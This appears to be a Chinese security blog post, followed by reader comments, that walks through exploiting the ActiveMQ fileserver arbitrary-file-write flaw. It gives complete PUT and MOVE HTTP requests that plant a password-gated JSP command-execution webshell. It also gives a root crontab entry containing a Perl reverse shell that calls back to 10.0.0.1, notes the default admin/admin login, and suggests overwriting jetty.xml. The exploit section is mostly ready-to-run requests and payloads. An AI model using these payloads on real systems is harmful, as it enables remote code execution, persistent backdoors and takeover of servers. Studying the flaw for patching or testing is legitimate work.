ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:
- 其使用率并不高
- 文件操作容易出现漏洞
所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
在测试过程中,可以关注ActiveMQ的版本,避免走弯路。
本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
文件写入有几种利用方法:
- 写入webshell
- 写入cron或ssh key等文件
- 写入jar或jetty.xml等库和配置文件
写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。
分别说一下上述几种利用方法。
写入webshell
前面说了,写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问
默认的ActiveMQ账号密码均为admin,首先访问http://ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:

然后上传webshell:
PUT /fileserver/1.txt HTTP/1.1 Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Length: 380 <% if("chaplin".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

移动webshell到web目录下的api文件夹(/opt/activemq/webapps/api/cmd.jsp)中:
MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///opt/activemq/webapps/api/cmd.jsp Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close

访问webshell(需要登录),默认的账号密码都是admin,实战中有弱口令就非常棒了:


写入crontab,自动化弹shell
这是一个比较稳健的方法,首先上传cron配置文件(注意,换行一定要/n,不能是/r/n,否则crontab执行会失败):
PUT /fileserver/2.txt HTTP/1.1 Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Length: 241 */1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

将其移动到/etc/cron.d/root:
MOVE /fileserver/2.txt HTTP/1.1 Destination: file:///etc/cron.d/root Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close

如果上述两个请求都返回204了,说明写入成功。等待反弹shell:

这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。
写入jetty.xml或jar
理论上我们可以覆盖jetty.xml,将admin和api的登录限制去掉,然后再写入webshell。
有的情况下,jetty.xml和jar的所有人是web容器的用户,所以相比起来,写入crontab成功率更高一点。
尚未测试。

河南省郑州市 1F
这种漏洞也太老了吧,现在用5.14以后的版本就没事了。
广东省深圳市 B1
@ 幻彩琉璃 老洞归老洞,很多内网系统还是老版本,讲清楚没毛病。
山西省太原市 2F
之前测试遇到过,fileserver默认关掉确实安全多了。
上海市 3F
写crontab弹shell那个方法,如果activemq不是root跑的话是不是就没用了?
山东省滨州市 4F
实战中遇到admin弱口令的概率大吗?
巴基斯坦 5F
感觉操作步骤挺清晰的,适合入门上手。
江苏省徐州市 6F
有谁试过写入jar文件吗?想知道成功率怎么样。
黑龙江省大庆市 7F
这个漏洞利用门槛感觉不算高,但前提条件挺多的。
广东省广州市 8F
图片里标出来的路径是关键,不知道绝对路径就挺麻烦的。
浙江省 9F
这种老洞现在在外部互联网上应该很少见了吧,主要在内网?
日本 10F
MOVE请求这个点确实容易被忽略,设计上就有问题。
江苏省常州市 11F
写入crontab那个方法得是root权限才行,条件有点苛刻了。
湖南省长沙市 12F
这个洞确实挺经典的,当年不少中招的。